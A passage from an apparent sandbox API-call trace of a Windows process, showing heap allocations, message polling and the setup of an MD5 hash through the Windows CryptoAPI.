(HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0238.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0238.753] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0238.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0238.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0238.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0238.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0238.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.755] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0238.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.755] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0238.755] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.755] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0238.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0238.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.756] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0238.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.756] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0238.762] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 1 [0238.762] TranslateMessage (lpMsg=0x8cef58) returned 0 [0238.762] DispatchMessageW (lpMsg=0x8cef58) returned 0x0 [0238.762] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0238.762] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0238.762] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0238.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0238.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0238.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0238.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0238.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0238.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0238.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0238.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0238.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0238.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0238.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0238.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0238.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e512c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0238.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0238.838] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0238.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0238.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0238.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0238.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0238.839] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: 